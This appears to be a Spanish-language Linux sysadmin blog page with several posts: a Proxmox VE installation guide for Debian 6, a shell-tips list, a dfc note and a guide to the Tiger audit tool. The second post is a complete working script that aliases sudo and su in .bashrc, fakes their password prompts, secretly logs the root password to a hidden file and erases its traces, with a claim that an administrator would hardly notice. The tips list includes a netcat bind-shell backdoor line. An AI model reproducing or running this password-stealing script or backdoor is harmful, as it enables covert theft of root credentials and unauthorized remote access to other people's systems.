d4nyr3y

Buenas como estan? .. en esta entrega y siguiendo con el fomento al software libre, les traigo un howto de como instalar Proxmox, Proxmox Virtual Environment en un debian 6 de 64 bits. Proxmox Virtual Environment, es un proyecto de código abierto, desarrollado y mantenido por Proxmox Server Solutions GmbH y el apoyo financiero de Internet Foundation Austria (IPA). Una completa plataforma de virtualización basada en sistemas de código abierto que permite la virtualización tanto sobre OpenVZ como KVM. Es una distribución bare-metal, basada en Debian con solo los servicios básicos para de esta forma obtener un mejor rendimiento. Proxmox, no es solo una maquina virtual más, con una interfaz gráfica muy sencilla esta herramienta permite la migración en vivo de maquinas virtuales, clustering de servidores, backups automáticos y conexión a un NAS/SAN con NFS, iSCSI, etc… Al utilizar OpenVZ se puede cambiar tanto memoria RAM como espacio en disco asignados, en tiempo real y sin reiniciar el sistema. Otra cosa muy interesante son las plantillas, que consisten en un sistema operativo con algún software preinstalado, que se descargan directamente desde la interfaz de administración y crear una máquina virtual a partir de ellas. Ok vamos por parte .. editamos el archivo sources.list vim /etc/apt/sources.list y agregamos: deb http://ftp.at.debian.org/debian squeeze main contrib # PVE packages provided by proxmox.com deb http://download.proxmox.com/debian squeeze pve # security updates deb http://security.debian.org/ squeeze/updates main contrib Guardamos y salimos con: esc :wq! http://i.imgur.com/oe5Af.png[/IMG]] Agregamos la key .. wget -O- "http://download.proxmox.com/debian/key.asc" | apt-key add - Luego: aptitude update y un ratito despues: aptitude full-upgrade Instalamos Proxmox VE Kernel aptitude install pve-firmware aptitude install pve-kernel-2.6.32-16-pve reiniciamos booteando desde Proxmox VE Kernel en el grub .. en la captura vemos como se genera el nuevo grub.cfg .. ssh root@ipservidor pass uname -a (para saber que booteamos con el kernel de proxmox) Linux d4nyr3y 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64 GNU/Linux Instalamos las packages de proxmox .. aptitude install proxmox-ve-2.6.32 La finger print configuramos pve-redirect para apache2 a2ensite pve-redirect.conf Reiniciamos apache /etc/init.d/apache2 restart Instalamos algunas packages q faltan aptitude install ntp ssh lvm2 postfix ksm-control-daemon vzprocps https://ip:8006 y listo!!! nos logueamos con root del sistema!! El rendimiento del hardware es fantastico: decargamos un template? o si ya lo tienen descargado lo dejan en el directorio: /var/lib/vz/template/cache/ asi cuando quieren crear una virtual machine desde un template ya lo tienen disponible .. Bueno espero que les sea de utilidad y hago este aporte para que sepan que en lo que es virtualizacion no solo existe Vmware y VirtualBox ... en el mundo del open source es muy grande la ventaja que se tiene en lo que es virtualizacion .. imaginen poder ampliar la memoria o discos duros de servidores que estan en produccion SIN TENER QUE APAGARLOS y aguantar las quejas de los users o del dueño de la empresa jejeje ... para nosotros los sysadmin linux esto es magico ... A leer a leer y poner en practica esto con alguna virtual srs!!!! EL CONOCIMIENTO NUNCA NOS SERA QUITADO!!! SIGAMOS APOSTANDO POR UNA MENTE FREE!! CONOCIMIENTOS OPEN SOURCE Y NO AL SOFT PRIVATIVO!!! salu2 d4nyr3y!!! fte: google y la bendita internet!!

Este script captura el password del root al intentar loggearse desde una session de usuario estandar con los comandos sudo o su. Basicamente lo que hace es crear un alias a los comandos sudo y su. Cuando el usuario ejecuta sudo o su se le pide el password normalmente y cuando lo introduce este es capturado y guardado en un archivo oculto para posterior consulta a la vez que le da error de password incorrecto y le retorna el prompt para que lo introduzca de nuevo como sucede de forma comun. Una vez que el password es introducido por segunda vez este es aceptado ya que este segundo prompt es el real y una vez que es aceptado se ejecuta la orden para la que el usuario invoco sudo, en caso que fuera sudo, o devuelve el prompt del root en caso de su. O sea que las posibilidades de sospecha por parte de un administrador serian casi nulas. Espero que les sea util. Saludos. #!/bin/bash # ############################################################################## # # Descripcion: Falsifica los comandos sudo y su haciendose pasar por # los mismos con el fin de obtener el password del root. # Una vez obtenido el password es guardado en un log # llamado: .plog en el home del usuario. # # # Explicacion del modo de operacion: # (1) Se crea una copia del archivo .bashrc llamada .bashrcbk. # (2) Se crean dos alias en el .bashrc original de los commandos # <sudo> y <su> que llaman a nuestro programa en caso de ser # invocado cualquiera de los dos. # (3) Se crearan dos scripts que simulan los comandos <sudo> y <su> # y capturan el password del root guardandolo en el archivo # .plog en el home del usuario. Estos archivos se encuentran # en el home del usuario con los nombres: ".sudo_su" y ".sudo_sd". # (4) Se restaura el .bashrc original desde la copia .bashrcbk. # (5) Se borran los archivos creados. # (6) Se ejecuta <bash> cargando el .bashrc original para no # tener que reiniciar el terminal en ese momento. # # Modo de empleo: # (1) Ejecutar el programa desde un terminal: <sh sskeylogger.sh> (o el nombre # que le quieras poner), o darle permisos de ejecucion y ejecutarlo # desde el navegador de archivos. # (2) Cerrar el terminal. # (3) Esperar a que sea ejecutado el comando <sudo> o <su>. # (4) Leer el log generado, puede ser con el siguiente comando: # <cat $HOME/.plog> # # Nota: Este programa fue escrito exclusivamente con fines didacticos, por lo # que el escritor no se hace responsable de un mal uso del mismo. # ############################################################################## # Backup del .bashrc cp $HOME/.bashrc $HOME/.bashrcbk; # Suplantacion de <su> echo "alias su='$HOME/.sudo_su'" >> $HOME/.bashrc; echo "#!/bin/bash"> $HOME/.sudo_su; echo "mv $HOME/.bashrcbk $HOME/.bashrc" >> $HOME/.sudo_su; echo "stty -echo" >> $HOME/.sudo_su; echo "read -p "Contraseña: " IN" >> $HOME/.sudo_su; echo "stty echo" >> $HOME/.sudo_su; echo "echo" >> $HOME/.sudo_su; echo "date >> $HOME/.plog" >> $HOME/.sudo_su; echo "echo Password: $IN >> $HOME/.plog" >> $HOME/.sudo_su; echo "sleep 2" >> $HOME/.sudo_su; echo "echo "su: Fallo de autenticación"" >> $HOME/.sudo_su; echo "rm $HOME/.sudo_sd" >> $HOME/.sudo_su; echo "rm `basename $0`" >> $HOME/.sudo_su; echo "bash --rcfile .bashrc" >> $HOME/.sudo_su; chmod 755 $HOME/.sudo_su; # Suplantacion de <sudo> echo "alias sudo='$HOME/.sudo_sd'" >> $HOME/.bashrc; echo "#!/bin/bash"> $HOME/.sudo_sd; echo "mv $HOME/.bashrcbk $HOME/.bashrc" >> $HOME/.sudo_sd; echo "stty -echo" >> $HOME/.sudo_sd; echo "read -p "[sudo] password for `id -un`: " IN" >> $HOME/.sudo_sd; echo "stty echo" >> $HOME/.sudo_sd; echo "echo" >> $HOME/.sudo_sd; echo "date >> $HOME/.plog" >> $HOME/.sudo_sd; echo "echo Password: $IN >> $HOME/.plog" >> $HOME/.sudo_sd; echo "sleep 2" >> $HOME/.sudo_sd; echo "echo "Sorry, try again."" >> $HOME/.sudo_sd; echo "rm `basename $0`" >> $HOME/.sudo_sd; echo "rm $HOME/.sudo_su" >> $HOME/.sudo_sd; echo "sudo -k;" >> $HOME/.sudo_sd; echo "sudo $*; bash --rcfile .bashrc" >> $HOME/.sudo_sd; chmod 755 $HOME/.sudo_sd; PD: probado y testeado en Linux d4nyr3y 2.6.32-5-amd64 #1 SMP Fri Feb 15 15:39:52 UTC 2013 x86_64 GNU/Linux Debian 6.0.7

- sshfs user@host:/path/to/dir /path/to/mount/point – monta el directorio/sistema de ficheros a través de SSH. - !!:gs/foo/bar – ejecuta el comando anterior reemplazando la cadena “foo” por “bar”. - mount | column –t – muestra los sistemas de ficheros montados de una forma ordenada. - command – ejecuta un comando sin guardarlo en el historial. - ssh user@host cat /path/to/remotefile | diff /path/to/localfile – compara un fichero remoto con un fichero local. - ffmpeg –f x11grab –s wxga –r 25 –I :0.0 –sameq /tmp/out.mpg – captura el video de un escritorio Linux. - $ssh-copy-id user@host – copia las claves SSH a user@host para permitir inicios de sesión sin contraseña SSH. - mtr google.com – mtr combina la funcionalidad de traceroute y ping. - cd - – cambia a directorio de trabajo anterior. - :w !sudo tee % – guarda un fichero que has editado en vim sin los permisos necesarios. - python –m SimpleHTTPServer – ejecuta un servidor web en el directorio actual accesible mediante http://$HOSTNAME:8000/. - sudo !! – ejecuta el último comando como root. - wget –random-wait –r –p –e robots=off –U mozilla http://www.example.com – descarga un sitio web entero. - du -h --max-depth=1 – lista el tamañao de todos los subdirectorios desde la posición actual. - man ascii – acceso rápido a la tabla ASCII. - net rpc shutdown –I WindowsIPAddr –U user%password – apaga un Windows desde Linux. - (cd /tmp && ls) – salta a un directorio, ejecuta un comando y vuelve al directorio actual. - ps –aux | sort –nk + 4 | tail – muestra el top 10 de procesos ordenados por uso de memoria. - history | awk ‘{a[$2]++}END{for(i in a}{print a “ ” i}’ | sort –rn | head – lista los comandos más usados. - ping –i 60 –a IPAddr – configura una alarma sonora cuando la dirección IP se pone en línea. - echo “you can simulate on-screen typing” | pv –qL 10 – simula escritura. - python –m smtpd –n –c DebuggingServer localhost:1025 – arranca un sencillo servidor SMTP escuchando en el puerto 1025 de localhost. - lsof –i – ver la actividad del servicio de red en tiempo real. - mplayer –ao pcm –vo null –vc dummy –dumpaudio –dumpfile – ripea audio desde un fichero de video- - sudo dd if=/dev/mem | cat | strings – muestra todos los valores string en memoria. - cat /etc/issue – muestra la distribución Linux instlada. - wget –qO – http://www.tarbal.com/tarball.gz | tar zxvf - – extrae tarball desde Internet. - nc –vv –l –p 1234 –e /bin/bash – crea un backdoor para permitir conexiones remotas a bash. ¿O había alguno que no sabías? ¡Buen fin de semana! Fte: google .. etc, etc ..

dfc es un comando que nos va a dar el espacio disponible de nuestras particiones de forma simple y efectiva. Es una alternativa más vistosa al comando df Para instalarlo hacemos: root@d4nyr3y:/home/d4nyr3y# aptitude install dfc Una vez instalado podemos comenzar a usarlo. Si hacemos dfc -h podemos ver las diferentes opciones de este comando

Tiger crea informes sobre la seguridad de nuestro sistema Tiger es un conjunto de más de 40 modulos con tests especificos para auditar nuestro sistema frente a posibles fallos de seguridad. Su objetivo principal es detectar modos de comprometer a root en nuestro sistema concreto. Aparte de crear algunos archivos nuevos con informes Tiger no cambia nada en el sistema, simplemente aconseja sobre que riesgos podemos estar sufriendo y deja los posibles arreglos al usuario. En cualquier caso permite tomar conciencia rápidamente de posibles errores o fallos en la administración de nuestros sistemas y a menudo nos indica como podemos solucionarlos. Instalar: # apt-get install tiger * Si necesitamos auditar sistemas mixtos con otros sistemas operativos aparte de linux instalaremos asimismo el paquete tiger-otheros Uso: (desde un terminal root) # tiger El programa empezará a realizar tests de seguridad, se tomará generosamente su tiempo y si no se le molesta acabará, digamos media hora despues, con una línea de tipo: "un informe de seguridad se ha escrito en /var/log/tiger/security.report.nombre_del_ordenador.fecha-hora_del_informe" Si no necesitamos correr todas las comprobaciones de seguridad podemos indicar específicamente que módulos debe de realizar y se saltará el resto, con lo que se gana bastante tiempo, de todas maneras la primera vez merece la pena dejarle que haga todos los tests (comportamiento por defecto) El informe de seguridad se escribe por defecto en /var/log/tiger, si queremos que lo escriba en otro directorio usamos: # tiger -l otrodirectorio Una vez creado el informe podemos leerlo con less, more o nuestro editor favorito: $ less /var/log/tiger/security.report.mipc.090707-13:30 Interpretación del informe: Para conseguir interpretar los errores que encontraremos tenemos 3 opciones principalmente, la primera decirle que inserte los comentarios para todos y cada uno de los errores encontrado directamente en el informe con la opción tiger -e, (Esto hace el informe mucho más pesado de leer, ya que repite explicaciones si hay errores duplicados), la segunda crear un archivo aparte más condensado con las explicaciones (no repetidas) con tiger -E y la tercera preguntar sólo por los casos que nos interesen más con otro programa que viene en el paquete llamado tigexp. Para usarlo necesitamos saber el código de referencia de los fallos de seguridad estudiados por tiger. Cada anotación en el informe de seguridad lleva su correspondiente código entre corchetes [] basta con escribirlo después de tigexp y nos dará una breve explicación (en ingles) sobre el problema y algunas cosas que podemos hacer al respecto Por ejemplo si en el informe hay una línea que ponga: --WARN-- The port for service ... etc, podríamos escribir el comando #tigexp inet003w que nos devuelve una breve explicacion en inglés: "The indicated port number is assigned to other service, this indicates either a misconfiguration in the services database, or a possible sign of an intrusion. This should be checked and corrected. If is not apparent why it is like this, the system should be checked for other signs of intrusion" Tiger clasifica por gravedad los errores que encuentra en 6 categorías, que son (de mayor a menor gravedad ) --ALERT--, --FAIL--, --WARN--; --ERROR-- y --CONFIG-- Alert y fail indican fallos de seguridad importantes en nuestro sistema que pueden llevar a intrusiones, los mensajes tipo warn son más corrientes y menos graves. Error y config indican posibles problemas en la configuración o uso del programa. Esto permite usar grep directamente para filtrar los resultados del informe y echar un vistazo rápido (por ejemplo $ less /var/log/tiger/security.report.mipc.090707-13:30 |grep ALERT ) Es importante que antes de seguir ciegamente las sugerencias del programa entendamos que estamos haciendo, especialmente si somos novatos o podemos tener problemas posteriormente. No todas las sugerencias son adecuadas a todos los tipos de usuarios y sistemas (algunas presuponen cierta habilidad del administrador para manejar el sistema posteriormente y si nuestro nivel es bajo pueden ser incluso contraproducentes). El programa en cualquier caso suele dar buenas pistas que nos permiten tener un punto de partida para investigar más a fondo por nuestra cuenta. Algunas Caps .. de la instalacion y la ejecucion .. Salu2

Sin descripción